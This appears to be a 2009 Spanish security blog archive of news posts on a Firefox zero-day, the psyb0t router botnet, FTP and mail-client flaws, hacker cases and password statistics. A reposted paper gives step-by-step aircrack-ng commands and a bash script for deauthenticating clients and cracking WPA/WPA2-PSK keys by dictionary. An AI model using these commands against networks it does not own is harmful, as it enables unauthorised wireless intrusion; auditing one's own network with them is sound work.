sábado, 28 de marzo de 2009

Mx One Antivirus 4.0



¿ Que es Mx One Antivirus ?
Mx One es un antivirus diseñado para protejer los dispositivos de almacenamiento extraíble como memorias usb( también conocidas como pendrives) , iPod™, mp3, mp4, memorias M2, SD , microSD, Entre muchos más dispositivos de una forma eficaz y completamente gratuita.

Caracteristicas.
+Protección contra: Virus, Troyanos, Gusanos, Spyware ( Programas espía ), Herramientas de Hackers ( Hacktools ), Software de Riesgo ( Riskware ).
+Compatible con cualquier antivirus residente como por ejemplo: Nod32™., Kaspersky™., Bitdefender™., AVG™., Norton™., Panda™., AVG™, Avast™, Avira Antivir™, entre otros.
+ Protección en tiempo real con..
--Sistema "CHECK AND DESTROY" detecta y elimina todos los virus que traten de infectar su dispositivo mientras está conectado en una PC infectada, incluso virus desconocidos.
--Sistema de protección "Guardián" protege su PC de virus que vienen en dispositivos USB infectados y que al conectarse a su equipo lo infectan sin importar si el dipositivo tiene Mx One Antivirus instalado o no, además detecta virus incluso desconocido.
+ Protección contra virus desconocidos y nuevas variantes con "HEURISTIC ONE" Y "GENERIC ONE"
+ Es muy pequeño sólo se necesita 1Mb de espacio diponible ya sea en la PC o en el dispositivo extraíble.
+ Completamente gratuito.
+ Y Mucho más.

Descargar desde la web del autor

viernes, 27 de marzo de 2009

firefox XSL parsing remote memory corruption poc

// firefox XSL parsing remote memory corruption poc

// k`sOSe - works both in windows and linux

http://milw0rm.com/sploits/2009-ffox-poc.tar.gz

# milw0rm.com [2009-03-25]

jueves, 26 de marzo de 2009

Vulnerabilidad 0 day en Mozilla Firefox 3.x para todos los sistemas operativos

El día 25 de marzo se ha publicado sin previo aviso una prueba de concepto que hace que Firefox deje de responder. No existe parche disponible y se sabe que la vulnerabilidad, en realidad, permite ejecución de código. Se trata por tanto, de un 0 day. Al parecer la fundación Mozilla ya ha programado la solución pero no hará pública una nueva versión 3.0.8 del navegador hasta principios de la semana que viene.

El pasado miércoles, un tal Guido Landi hacía públicos (sin previo aviso) los detalles de una vulnerabilidad que permite la ejecución de código en el navegador con solo interpretar un archivo XML especialmente manipulado. En principio la prueba de concepto publicada hace que el navegador deje de responder, pero es posible de forma relativamente sencilla modificar el exploit para que permita la ejecución de código. El problema afecta a todas las versiones (actual y anteriores) del navegador sobre cualquier sistema operativo.

Los desarrolladores de Mozilla han calificado la vulnerabilidad como crítica y urgente, y afirman que ya lo tienen solucionado (en realidad se trata simplemente de un cambio de orden de una línea de código), pero que no publicarán Firefox 3.0.8 hasta principios de la semana que viene. Si el fallo es también reproducible en Thunderbird, es previsible que haya que esperar incluso más tiempo para que se publique una nueva versión.

Se recomienda no visitar páginas sospechosas. Los usuarios más avanzados pueden descargar el archivo corregido directamente del repositorio y recompilar.

Más Información:

Exploitable crash in xMozillaXSLTProcessor::TransformToDoc
https://bugzilla.mozilla.org/show_bug.cgi?id=485217

Firefox Fix Due Next Week After Attack Is Published
http://www.pcworld.com/article/161988/

Routers, modems y botnets

Desde hace unas semanas DroneBL ha sufrido un ataque distribuido de denegación de servicio procedente de una botnet llamada 'psyb0t'. Nada nuevo si tenemos en cuenta que DroneBL ofrece un servicio gratuito de publicación de listas negras de IP en tiempo real, lo cual no es precisamente una manera de ganarse admiradores entre las filas de creadores de malware, spammers, etc. Lo interesante del asunto se lo encontraron cuando recabaron información sobre su atacante.

El gusano que teje 'psyb0t' no tiene como objetivo los ordenadores personales o servidores. El binario ni tan siquiera está compilado para la omnipresente arquitectura x86. Su foco de infección se encuentra en los routers y modems ADSL con Linux y procesador MIPS. El gusano efectúa un barrido por rangos de IP escaneando los puertos 22, 23 y el 80, buscando una vulnerabilidad que expone la administración remota del dispositivo a través de telnet, ssh e interfaz web inclusive con los permisos por defecto. Si la configuración ha sido modificada, lo intentará por fuerza bruta.

Tras obtener una shell con permisos de administrador borra el archivo '/var/tmp/udhcpc.env' que pertenece al cliente DHCP y comprueba la existencia del comando wget para efectuar la descarga de una réplica del gusano con el mismo nombre y ruta que el archivo borrado. Tras ello inyecta reglas en iptables para cerrar la entrada en los puertos 22, 23 y 80 y así evitar su apertura lícita y reinfección. Una vez infectado, el nuevo nodo, conecta a un servidor IRC donde procesa el topic que contiene instrucciones para los bots.

Aunque el primer contacto con esta botnet fue documentado por un tal Terry Baume en enero de este año, parece ser que este es el primer ataque a gran escala o el incidente que ha tenido mayor repercusión mediática hasta el momento. Varios son los factores que no pasaron por alto los creadores de 'psyb0t', un vector fácil, contraseñas por defecto y exposición de la administración remota, una presa descuidada, como un olvidado router con el que no se interactúa y se mantiene encendido las 24 horas, y sobre todo el silencio: ¿Cuándo fue la última vez que monitorizaste el tráfico del router?

Mas información:

Blog de DroneBL
http://dronebl.org/blog/8

Your router, plausible home to a stealth rootkit?
http://nenolod.net/~nenolod/router-malware.pdf

PSYB0T 2.5L
http://www.adam.com.au/bogaurd/PSYB0T.pdf

martes, 24 de marzo de 2009

Femitter Server FTP 1.x Multiple Vulnerability

Femitter Server FTP 1.x Multiple Vulnerability
----------------------------------------------------

Arbitrary:
----------
The vulnerability is caused due to an input validation error when processing FTP requests. This can be
exploited to read, modify, or delete arbitrary files from the affected system via directory traversal
attacks.

Remote Crash:
-------------
The vulnerability is caused due to an error in handling the RETR command. This can be exploited to crash
the FTP service by sending the "RETR" command without sending the "PORT" command.

IncrediMail Xe (latest version) XSS Vulnerability

#!/usr/bin/perl -w

# IncrediMail Xe (latest version) XSS Vulnerability
#
# Discovered by : Bui Quang Minh
#
# Description : The most of popular Mail Client now exclude Script Code for mail content.
# It aims to avoid the type of XSS exploitation (For e.g: stolen cookie).
# IncrediMail also remove Script Code when the user read mail.
# However, I found the "Reply" and "Forward" function of the mail client
# has not handled mail content well resulting in XSS vulnerability.

Más detalles: http://www.milw0rm.com/exploits/8284

domingo, 15 de marzo de 2009

El 'hacker del Pentágono' pierde su batalla contra la extradición a EE.UU.

Londres. (EFE).- El pirata informático británico Gary McKinnon, conocido como 'Solo', ha perdido su batalla contra la extradición a EE.UU. al rechazar la fiscalía del Reino Unido procesarle en este país.

Los representantes legales de McKinnon pidieron al fiscal en diciembre que le procesara aquí por delitos menores, después de que el interesado, de 42 años, firmara una declaración en la que admitía haber violado la ley británica de abuso informático de 1990. Pero la fiscalía ha rechazado presentar cargos contra el acusado al amparo de esa legislación, ya que considera que las alegaciones de Estados Unidos son mucho más graves.

EE.UU. le reclama por presuntas "actividades informáticas fraudulentas", después de que el pirata accediera ilegalmente a varios de sus sistemas, que se suponen los más seguros del planeta, entre febrero del 2001 y marzo del 2002, como ordenadores de la Administración Nacional de Aeronáutica y del Espacio (NASA), el Ejército, la Marina, el Departamento de Defensa y la Fuerza Aérea.

El pasado 28 de agosto, el Tribunal Europeo de Derechos Humanos rechazó el recurso contra la extradición que había presentado McKinnon, que entró en los ordenadores del Gobierno estadounidense antes y después de los atentados del 11 de septiembre del 2001 (11-S).

El británico alegó en esa ocasión que, de ser condenado en EE.UU., podría sufrir tratos inhumanos o degradantes, argumento que aparece en la Convención Europea de Derechos Humanos.

'Solo' había perdido el 30 de julio del 2008 otro recurso judicial en la Cámara de los Lores del Reino Unido, que respondía a una sentencia anterior del Tribunal Superior, que en 2007 ordenó su extradición.

El presunto "cíber-delincuente" puede ser condenado en EE.UU. a una pena de varias décadas de prisión, además de cuantiosas multas, ya que la Fiscalía sostiene, entre otras cosas, que modificó y borró archivos en una instalación naval poco después de los atentados del 11-S, lo que dejó los sistemas no operativos.

'Solo' admite que accedió a los ordenadores desde su vivienda en Londres, pero asegura que no pretendía sabotearlos, sino que sólo buscaba información sobre ovnis, a fin de destapar una supuesta conspiración para ocultar avistamientos.

La defensa de Gary McKinnon ha alegado que su cliente no es un terrorista ni un simpatizante del terrorismo, y sostiene que el Gobierno británico rechaza procesarle para permitir a la Administración estadounidense dar ejemplo con su caso. Además, señalan que el experto informático entró en los ordenadores estadounidenses no por malicia sino por "ingenuidad", ya que padece el síndrome de Asperger, un tipo de autismo, por lo que no debe ser considerado un delincuente.

via lavanguardia












La web de Tussam, "hackeada" por un usuario descontento


La web de la empresa de autobuses de Sevilla Tussam podría haber sido «hackeada» durante la mañana de hoy por un usuario cansado del servicio de la empresa.

Según meneame.net, el "hacker" dejó un mensaje en la web de Tussam el que se queja abiertamente de los malos servicios y adjuntaba una foto de Nelson, uno de los personajes de la serie The Simpsons.

Así, se puede leer: "Gracias por hacerme esperar el autobús más de 1 hora todos los días. Gracias por unos precios tan abusivos. Gracias por tener que aguantar en pie 30 minutos de recorrido. En fin, Gracias por vuestra total ineptitud".

"No comprendo como prestáis un servicio tan ineficiente y luego pretendéis que la gente pague de su bolsillo tonterías como los monitores de los autobuses. Por hacer bonos de viaje con transbordo que no sirven de nada. Pues te pegas 1 hora esperando cada autobús".

Via abcdesevilla

Hack activa una CPU extra en chip de AMD


Revelan procedimiento para activar un núcleo oculto del procesador AMD Phenom.

Diario Ti: Como su nombre lo indica, el chip AMD Phenom II x3 710, es un procesador de tres núcleos. Sin embargo, al disponer de la placa madre adecuada es posible convertirlo en un procesador de cuatro núcleos.

El cuarto núcleo está físicamente presente, pero bloqueado en la BIOS con el fin de reducir costos. Los usuarios que disponen de una placa madre Biostar sólo necesitan seleccionar la función automática de Advanced Clock Calibration y el cuarto núcleo queda inmediatamente activo.

"Usted se responsabiliza"
Los expertos de la publicación Tom´s Hardware comentan que lo anterior revela que "los ingenieros de hardware y los programadores de la BIOS al parecer no han conversado". La publicación indica que el propio usuario que decida aplicar esta función se responsabiliza de los resultados. En efecto, se trata de un hack no oficial, que podría dañar o inutilizar la CPU.

Tom´s Hardware indica que "la CPU aparece como cuatro núcleos en Windows, y según los ensayos prácticos que hemos realizado el último núcleo tiene un gran impacto en la velocidad obtenida".

Fuente: Tom´s Hardware

Via diarioti

viernes, 13 de marzo de 2009

20 años de Internet

Hace 20 años, el 13 de marzo de 1989 comenzó la andadura de una de las mayores invenciones d todos los tiempo, la World Wide Web. La idea inicial era ayudar a conectar a la gente usando la World Wide Web con el entonces popular navegador ViolaWWW que posteriormente fue reemplazado por Mosaic en 1993.

Tim Berners-Lee fue el hombre que estuvo detrás del “Information Management: A Proposal”, lo que llevó al camino de lo que hoy consideramos Internet. Citamos textualmente a Tim Berners-Lee:

“Deberíamos trabajar hacia un sistema universal de información enlazada, in el que la generalidad y la portabilidad son más importantes que bonitas técnicas gráficas y complejas funcionalidades extra. El objetivo sería premitir un lugar para encontrar cualquier información o referencia que uno crea importante, y una forma de encontrarla posteriomente. El resultado debe ser lo suficientemente atractivo para que el uso de la información contenida crezca y pase un umbral crítico, el régimen de utilización a su vez fomente mayor utilización.”

Sólo hace 20 años desde la creación de la World Wide Web, y ha revolucionado la forma en la que el mundo opera, interconectando millones de usuarios. Internet ha cambiado la forma de los países, negocios y gente han conectado.

Desde The Inquirer,

¡Feliz cumpleaños World Wide Web!.

Via
theinquirer

Videos de la BBC sobre botnets

Resumen



Envio de spam



Ataque de denegacion de servicio

Sitio web de phpbb hackeado: ¿Qué contraseñas usaban los usuarios?

Extraido integramente de: espaciohacker.com
Tras el hackeo de phpbb.com, publicaron las contraseñas usabas, aquí hay una
estadística.

Podemos ver que los usuarios siempre seguirá usando contraseñas no seguras...
Desde el comienzo de los sistema multiusuarios esto sucedía, no creo que deje de pasar.

16% de las contraseñas contiene el primer nombre de la persona.
14% contiene algún patrón del teclado, por ejemplo 123456.
4% es una variante de la palabra “password”, por ejemplo passw0rd.
5% hace referencia a algo de la cultura pop.
4% hace referencia a cosas cercanas, por ejemplo la marca del celular o de tu ordenador.
3% hace referencia a emociones. Ejemplo iloveyou
3% son palabras “no les importa en lo mas mínimo” ejemplo abc123
1.3% cosas que la gente vio en la televisión/cine
1% son cosas relacionadas a los deportes.



Fuente:
http://www.darkreading.com/blog/archives/2009/02/phpbb_password.html
http://www.kabytes.com/actualidad/analisis-de-las-contrasenas-de-phpbb/
http://www.espaciohacker.com/noticia-269

martes, 10 de marzo de 2009

Paper externo - Cracking WPA/WPA2-PSK with wordlist

-[ INFORMACIÓN ]---------------------------------------------------------------------

Titulo: Cracking WPA/WPA2-PSK with wordlist
Autor: ka0x
Contacto: ka0x01[alt+64]gmail.com
Fecha: 08/03/2009

---------------------------------------------------------------------------------


-[ ÍNDICE ]---------------------------------------------------------------------

0x01: Introducción
0x02: ¿Qué es el handshake?
0x03: Capturando handshake
0x04: Conseguir clave con diccionario
0x05: airoWPA-PSK.sh
0x06: Fin

---------------------------------------------------------------------------------


---[ 0x01: Introduction ]

En este pequeño texto se explicará como obtener la clave de una red inalámbrica con cifrado WPA/WP2
en la que se esté usando un sistema de clave compartida (pre-shared keys - PSK).
Para todo esto necesitaremos capturar un handshake y después con un diccionario atacar al handshake
para obtener la clave.

Imaginemos que en este caso tenemos la siguiente red inalambrica:

- ESSID: ap_labs
- BSSID: 00:1B:02:93:AF:9C
- CANAL: 1
- CLIENTE: 01:C2:B3:04:02:05


---[ 0x02: ¿Qué es el handshake? ]

Pues el handshake se genera cuando un cliente se asocia a la red inalámbrica.
Es como un saludo (apretón de manos) entre el punto de acceso y el cliente.
Son los paquetes que se envían entre el AP y el cliente en el momento de la asociación,
para que podamos empezar el ataque con diccionario en una red con cifrado WPA-PSK, necesitaremos haber
capturado estos paquetes.

---------------------------------------------------------------------------------



---[ 0x03: Capturando handshake ]

Bueno empecemos...
Como dije, íbamos a utilizar la suite de aircrack-ng, si queremos los sources y demás
podemos entrar a su web: http://www.aircrack-ng.org/doku.php#download

Si utilizamos debian, encontraremos el paquete en los repositorios, instalar:
# apt-get install aircrack-ng

Para poder capturar paquetes, tendremos que poner nuestro adaptador wireles en modo monitor:

# airmon-ng start
p.e: # airmon-ng start wlan0


Siempre se necesitará tener un cliente 'real' asociado en el AP.
Entonces una vez para empezar a capturar paquetes, utilizaremos airodump-ng:

# airodump-ng --bssid 00:1B:02:93:AF:9C -c 1 -w redWPA wlan0
--bssid -> MAC del punto de acceso.
-w redWPA -> guardará los datos obtenidos en el archivo "redWPA".
-c -> Canal del punto de acesso
wlan0 -> interfaz adaptador inalambrico.

Así capturaremos todo lo que pase por el punto de acceso con MAC: 00:1B:02:93:AF:9C
Entonces vayamos a capturar el handshake...


Como habíamos dicho antes el handshake se genera en el momento que un cliente se asocia al AP.
Entonces, cómo hacemos que se vuelva asociar el cliente al AP?

Facil, desautenticaremos al cliente del AP y esperamos a que se vuelva asociar,
para este proceso usaremos el ataque 0 de aireplay-ng. Este ataque enviará al cliente paquetes de
desautenticacion

Uso:
# aireplay-ng -0 5 -a -c
|-> Numero de desautenticaciones que se enviarán.
Si ponemos un 0, enviará desautenticaciones hasta que lo paremos.

En este caso:
# aireplay-ng -0 15 -a 00:1B:02:93:AF:9C -c 01:C2:B3:04:02:05 wlan0

Cuando ejecutemos esto segun el numero de desautenticaciones nos aparecerá algo así:
Sending DeAuth to station -- STMAC: [01:C2:B3:04:02:05]

En el momento que el cliente se desasocie y se vuelva a asociar al AP, nosotros con el airodump-ng
capturaremos el handshake.

¿Cómo sabemos que ya lo hemos capturado?

Pues en la ventana donde tenemos corriendo el airodump-ng, arriba a la derecha, veremos algo así:
CH 1 ] [ Elapsed: 14 mins ][ 2009-03-08 ][ WPA handshake: 00:1B:02:93:AF:9C

Una vez que nos aparezca eso, ya podemos cerrar todo, en el archivo redWPA-01.cap ya tendremos
el dichoso handshake =)

---------------------------------------------------------------------------------


---[ 0x04: Conseguir clave con diccionario ]


Una vez teniendo el handshake, ya podemos utilizar un diccionario de posibles claves
para que aircrack-ng compruebe haber si alguna de las claves del diccionario coincide
con la del AP.

¿Qué diccionario usar? pues el de john the ripper, alguno propio, hay muchos...
aunque se supone que esto es para comprobar la seguridad de tu red wireless y ya te tendrás
que saber de sobra tu clave.

La clave pre-compartida puede tener un tamaño de 8 a 63 caracteres.

Empecemos...

Si ejecutamos:
# aircrack-ng redWPA-01.cap

Podremos ver que tenemos un handshake:

---------
Opening wpa-hand.cap
Read 553 packets.

# BSSID ESSID Encryption

1 00:1B:02:93:AF:9C ap_labs WPA (1 handshake) <------ Choosing first network as target. Opening wpa-hand.cap Please specify a dictionary (option -w). Quitting aircrack-ng... --------- Uso de aircrack-ng con diccionario: # aircrack-ng -w


Suponiendo que nuestro archivo de datos capturados donde se encuentra el handshake se llama
redWPA-01.cap, lo ejecutaremos de la siguiente forma:


# aircrack-ng -w diccionario.lst redWPA-01.cap

Entonces aquí ya aircrack-ng se pondrá a comprobar las posibles claves del diccionario hasta obtenerla.
Una vez obtenida, nos aparecerá lo siguiente:

---------

Aircrack-ng 1.0 rc1


[00:00:00] 0 keys tested (0.00 k/s)


KEY FOUND! [ clave__ap ]


Master Key : 18 D4 E8 70 A0 B5 D2 26 4C 61 BA 85 5F 36 8F D9
DA 56 2A D2 51 B6 01 B6 A9 E8 61 B3 CD 92 7D 09

Transcient Key : DA 5E 56 09 35 9E 2D 9F 35 B0 C5 9E A9 41 71 B5
8A 8C B6 1B B5 A0 D2 C0 53 47 C6 05 CC 2C CA C0
C7 41 04 B2 F5 7D 44 DF 71 C5 11 78 5D DE A1 D0
F9 2E BE 54 22 46 82 24 35 91 7E 93 21 9D BF 78

EAPOL HMAC : 6A 31 F7 C0 C8 A7 83 37 50 FD 44 C3 8C 7D 2B 26

---------

Hay ya vemos que encontro la clave y que es 'clave__ap'.
Como vemos el proceso de obtener una clave WPA/WPA2-PSK no es tan dificil siempre y cuando
sepamos nuestra clave, ya que si no la sabríamos este proceso podría durar horas, dias e incluso !!semanas!!

---------------------------------------------------------------------------------



---[ 0x05: airoWPA-PSH.sh ]

Para simplificar un poco este proceso de obtención de la clave, hice un pequeño script en bash
sencillo que te puede servir si eres un poco vago :P

<-----------------airoWPA-PSK.sh--------------------->
#!/bin/bash

# airoWPA-PSK.sh v0.1
# written by ka0x

if [ $UID != 0 ]; then
echo "[!] NECESITAS EJECUTAR EL SCRIPT $0 CON PRIVILEJIOS DE SUPERUSUARIO"
exit
fi

comprueba_mac(){
if [ ! "${#1}" -eq "17" ]; then
echo -e "\033[31mMac Incorrecta\n\033[0m"
exit
fi
}
interfaces() {
echo -e "\n\033[31m[*] Seleccione la interfaz que va a utilizar: \033[0m\n"
INTERFACES=$(iwconfig | grep ESSID | awk '{ print $1 }')
select INTER in $INTERFACES; do
break;
done
clear
}

monitor(){
airmon-ng start $INTER
clear
menu
}

handshake(){
clear
read -p "[-] Introduzca la MAC del AP: " mac_ap
comprueba_mac $mac_ap
read -p "[-] Introduzca la MAC del Cliente: " mac_client
comprueba_mac $mac_client
read -p "[-] Introduzca el canal del AP: " mac_chanel
read -p "[-] Nombre de archivo donde se guardaran los datos capturados: " datas
xterm -hold -title "Obteniendo Handshake en $mac_ap" -geometry 96x60+0+0 -bg "#000000" -fg "#FFFFFF" -e airodump-ng --bssid $mac_ap -c $mac_chanel -w $datas $INTER && clear && menu
}

desautenticacion(){
clear
read -p "[-] Introduzca la MAC del AP: " mac_ap
comprueba_mac $mac_ap
read -p "[-] Introduzca la MAC del cliente asociado: " mac_cliente
comprueba_mac $mac_cliente
read -p "[-] Introduzca el numero de desautenticaciones: " num
xterm -hold -geometry 70x25-0+0 -bg "#000000" -fg "#99CCFF" -title "Desautenticando $mac_cliente del AP $mac_ap $num veces" -e aireplay-ng -0 $num -a $mac_ap -c $mac_cliente $INTER
clear
menu
}

crack_dicc(){
clear
read -p "[-] Introduzca la ruta del diccionario: " diccionario
echo "[-] Seleccione el archivo de datos capturados:"

LS_DIR=$(ls *.cap)
select DATA in $LS_DIR; do
break;
done

xterm -hold -geometry 70x25-0+0 -bg "#000000" -fg "#99CCFF" -title "Obteniendo clave con diccionario: $diccionario" -hold -e aircrack-ng -w $diccionario $DATA
menu
}

menu(){
echo -e "\n[*] Opciones:\n"
echo -e "\033[31m-=-=-=-=-=-=-=-=-=-=-=-=-\033[0m"
echo "1 - Activar Modo Monitor"
echo "2 - Capturar handshake"
echo "3 - Desautenticar cliente"
echo "4 - Fuerza bruta con diccionario a handshake"
echo "5 - Salir"
echo -e "\033[31m-=-=-=-=-=-=-=-=-=-=-=-=-\n\033[0m"

read -p "opcion> " OPCION

case $OPCION in
"1") monitor;;
"2") handshake;;
"3") desautenticacion;;
"4") crack_dicc;;
"5") exit;;
*) echo -e "\033[31m[!] OPCION NO VALIDA\n\033[0m" && menu;;

esac
}

interfaces
menu

# __EOF__
<------------------------------------------------>

---------------------------------------------------------------------------------


---[ 0x06: Fin ]

Bueno pues eso es todo, los pasos son bastantes sencillos, cualquier duda pueden
entrar a la web de aircrack-ng (http//www.aircrack-ng.org) donde podrán encontrar abundante documentación
o mismamente enviándome un email.


Espero que haya quedado bastante claro.

Un saludo!

# ka0x

---------------------------------------------------------------------------------

__EOF__


Via http://packetstormsecurity.org/papers/wireless/wpawpa2-crack.txt

domingo, 8 de marzo de 2009

El origen de internet - Documental en video y subtitulado al español

Número 1 de Informática Libre

Acaba de publicarse el primer número de una nueva revista gratuita dedicada a Linux y el software libre.

"Informática Libre", es una revista elaborada en Honduras y que está disponible para su libre descarga en formato PDF.

Algunos de los temas que trata este número son:
- Richard M. Stallman: Científico de la informática al servicio de la humanidad.
- Usa tu computadora sin disco duro.
- Los cibercafés pueden decir adiós a las Licencias.
- Razones para el uso del Software Libre en la educación.
- Herramientas libres en educación.
- Lo que se te ocurra… diseñalo con libertad.
- De todo para la oficina.
- Variedad para escuchar y ver sin restricciones.
- Juegos: Diversión para cipotes y adultos.
- Navega con seguridad.
- Y mucho más...

Descargar

Nuevos contenidos en la Red Temática CriptoRed (febrero de 2009)

Breve resumen de las novedades producidas durante el mes de febrero de 2009 en CriptoRed, la Red Temática Iberoamericana de Criptografía y Seguridad de la Información.

1. NUEVOS DOCUMENTOS PARA DESCARGA LIBRE DESDE CRIPTORED

* Documento que acompaña al vídeo con los mejores malos consejos en seguridad para redes WiFi (Eduardo Tabacman, Word, 2 páginas, España)
http://www.criptored.upm.es/guiateoria/gt_m488a.htm

* La seguridad en los documentos de identidad (Juan Crespo, Ciclo TASSI, pdf, 81 diapositivas, España)
http://www.criptored.upm.es/paginas/docencia.htm#catedraTASSI

2. NUEVOS DOCUMENTOS RECOMENDADOS PARA SU DESCARGA LIBRE DESDE OTROS SERVIDORES

* Informe de la Red de Sensores de INTECO del Mes de Enero de 2009 (España)
https://ersi.inteco.es/informes/informe_mensual_200901.pdf

* Guía de videovigilancia de la Agencia Española de Protección de Datos (España)
https://www.agpd.es/portalweb/canaldocumentacion/publicaciones/common/pdfs/guia_videovigilancia.pdf

* Vídeo: Los mejores malos consejos en seguridad para redes WiFi (España)
http://www.virusprot.com/VIDEO/WIFIERRORES.wmv

* White Paper: Data Loss In A Downturn - 10 Steps to Protecting High Value Information Assets and IP in association with Overtis Systems
http://mail.elsevier-alerts.com/go.asp?/bEEA001/qW0JMU8/xXEAMU8

* White Paper: CISO's Guide to Application Security in association with Fortify
http://mail.elsevier-alerts.com/go.asp?/bEEA001/qOPG7U8/x5RSHU8

* White Paper: Compliance with Data Handling Procedures in UK Government in association with Lumension
http://mail.elsevier-alerts.com/go.asp?/bEEA001/qKKF8U8/xJHX8U8

* White Paper: Enterprise Content Security: Lower Threats and Costs by Minimizing the Time to Protection in association with TrendMicro
http://mail.elsevier-alerts.com/go.asp?/bEEA001/qPKA1V8/xDGJAV8

3. CONGRESOS Y SEMINARIOS POR ORDEN CRONOLOGICO DE CELEBRACION

Marzo 25 al 27 de 2009: International Conference on Practical Applications of Agents and Multiagent Systems PAAMS 2009 (Salamanca - España)
http://paams.usal.es/

* Marzo 30 al 31 de 2009: Conferencia de Seguridad de la Información y Administración del Riesgo (Bogotá - Colombia)
http://www.isaca.org/Template.cfm?Section=Home&CONTENTID=46421&TEMPLATE=/ContentManagement/ContentDisplay.cfm

* Marzo 30 a abril 3 de 2009: Segunda Convención Internacional de Derecho Informático (Oviedo - España)
http://www.asimelec.es/Events/EventDetail.aspx?ID=115&OuTypeID=6&OuID=68

* Abril 20 al 24 de 2009: 18th International World Wide Web Conference WWW 2009 (Madrid - España)
http://www2009.org/

* Abril 23 al 25 de 2009: Cuarto Congreso Colombiano de Computación 4CCC (Bucaramanga - Colombia)
http://serverlab.unab.edu.co/4ccc

* Mayo 6 al 10 de 2009: 7th International Workshop on Security In Information Systems (Milán - Italia)
http://www.iceis.org/Workshops/wosis/wosis2009-cfp.htm

* Mayo 11 al 12 de 2009: V Congreso Iberoamericano de Telemática CITA 2009 (Gijón - España)
http://www.cita2009.com/

* Mayo 12 al 14 de 2009: Tercer Counter-eCrime Operations Summit CeCOS III (Barcelona - España)
http://www.antiphishing.org/events/2009_opSummit.html

* Junio 10 al 12 de 2009: 2nd International Symposium on Distributed Computing and Artificial Intelligence DCAI 09 (Salamanca - España)
http://dcai.usal.es/

* Junio 15 al 19 de 2009: Third IFIP WG 11.11 International Conference on Trust Management (West Lafayette - Estados Unidos)
http://projects.cerias.purdue.edu/IFIPTM/

* Junio 17 al 19 de 2009: IX Jornada Nacional de Seguridad Informática ACIS 2009 (Bogotá - Colombia)
http://www.acis.org.co/index.php?id=1246

* Junio 17 al 20 de 2009: Cuarta Conferencia Ibérica de Sistemas y Tecnologías de la Información (Póvoa de Varzim - Portugal)
http://www.aisti.eu/cisti2009/

* Junio 17 al 23 de 2009: IADIS Multi Conference on Computer Science and Information Systems 2009 (Algarve - Portugal)
http://www.mccsis.org/

* Junio 22 al 24 de 2009: E-Activity and Leading Technologies E-ALT2009 e InterTIC 2009 (Sevilla - España)
http://www.iask-web.org/e-alt09/e-alt09.html
http://www.iask-web.org/intertic09/intertic09.html

* Julio 5 al 8 de 2009: 14th IEEE Symposium on Computers and Communications (Sousse - Túnez)
http://www.comsoc.org/iscc/2009/

* Julio 8 al 10 de 2009: XV Jornadas de Enseñanza Universitaria de la Informática JENUI 2009 (Barcelona - España)
http://jenui2009.fib.upc.edu/

* Julio 13 al 16 de 2009: International Conference on Security and Management SAM '09 (Las Vegas - Estados Unidos)
http://www.world-academy-of-science.org/worldcomp09/ws/conferences/sam09

* Agosto 4 al 6 de 2009: Second International Conference on the Applications of Digital Information and Web Technologies (Londres � Reino Unido)
http://www.dirf.org/diwt2009/

* Septiembre 17 al 20 de 2009: 23rd International Conference SAER 2009 y Workshop eGovernance and Data Protection eG&DP 2009 (Varna - Bulgaria)
http://www.tu-sofia.bg/saer/

* Octubre 11 al 14 de 2009: IEEE 9th International Conference on Computer and Information Technology (Xiamen - China)
http://grid.hust.edu.cn/CIT2009/

* Octubre 19 al 21 de 2009: 3rd International Conference on Network and System Security NSS 2009 (Gold Coast - Australia)
http://nss.cqu.edu.au/

* Noviembre 16 al 18 de 2009: V Congreso Iberoamericano de Seguridad Informática CIBSI '09 (Montevideo - Uruguay)
http://www.fing.edu.uy/cibsi09

CONGRESOS ANUNCIADOS EN LA IACR:
* International Association for Cryptologic Research IACR Calendar of Events in Cryptology:
http://www.iacr.org/events/

4. CURSOS DE POSTGRADO, ESPECIALIDAD Y FORMACIÓN EN SEGURIDAD

* Puedes encontrar los enlaces en:
http://www.criptored.upm.es/paginas/eventos.htm#Cursos

5. OTRAS NOTICIAS SELECCIONADAS DEL MES DE FEBRERO DE 2009
Para ampliar estas noticias:
http://www.criptored.upm.es/paginas/historico2009.htm#feb09

* Más de 200 Universidades Iberoamericanas representadas en la Red Temática
http://www.criptored.upm.es/paginas/miembros_red_inst.htm

* Puesta en Marcha del Equipo de Seguridad M45 (España)
http://www.clustertic.net/m45

* Cursos Usos y Seguridad del DNIe y Técnicas Biométricas en Applus+ (España)
http://www.applusformacion.com

* Abierta Convocatoria para Envío de Artículos a la Revista SISTEMAS de ACIS (Colombia)
http://www.acis.org.co/

* Acto de Presentación del Libro Criptología y Seguridad (España)
http://www.etsit.upm.es/arbol-de-noticias.html?tx_ttnews%5Btt_news%5D=108&cHash=e64fe1b19b

* Presentación del Posgrado en Seguridad Informática de la UBA (Argentina)
http://www.fi.uba.ar/posgrados/index.php?cm=1&n=1&m=223&idl=916&idi=475

* Primer Encuentro de Seguridad Integral Seg2 de Red Seguridad y Borrmart (España)
http://www.criptored.upm.es/descarga/DobleProgramaSeg2_2009.pdf

* Nuevo Blog de Derecho Informático en México (México)
http://blog.derecho-informatico.org/

* Inicio del Máster en Buen Gobierno de las TIC de la Universidad de Deusto (España)
http://www.criptored.upm.es/descarga/Triptico_MAGTIC3.pdf

* Edición 2009 del Máster en Auditoría y Protección de Datos (España)
http://cpdp.uab.cat/postgraus/master_auditoria_proteccio_dades/esp/index.htm

* Nueva Edición de las Conferencias de Seguridad FIST en Madrid (España)
http://www.fistconference.org/?s=6&t=2

* V Versión de Asegúr@IT en el Auditorio del Instituto Tecnológico de Aragón (España)
http://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032405039&Culture=es-ES

6. OTROS DATOS DE INTERES EN LA RED

* Número actual de miembros en la red: 754
202 universidades y 283 empresas representadas
http://www.criptored.upm.es/paginas/particulares.htm

* Estadísticas: 20.488 visitas, con 78.098 páginas solicitadas y 32,14 GigaBytes servidos en febrero de 2009.
http://www.criptored.upm.es/estadisticas/awstats.www.criptored.upm.es.html.

7. V CONGRESO IBEROAMERICANO DE SEGURIDAD INFORMÁTICA CIBSI 2009
- Del 16 al 18 de noviembre, Montrevideo - Uruguay
- Fecha límite para el envío de trabajos: 15 de abril de 2009
http://www.fing.edu.uy/cibsi09

febrero 2009
http://www.criptored.upm.es/paginas/historico2009.htm#feb09

Via hispasec

viernes, 6 de marzo de 2009

Vulnerabilidad en Gmail - Grave?

Ni es la primera de este tipo ni tampoco me atrevo a llamarla nueva, porque al parecer Google fue informado en Agosto de 2007 de esta vulnerabilidad, que no ha solucionado porque le parece difícilmente explotable.

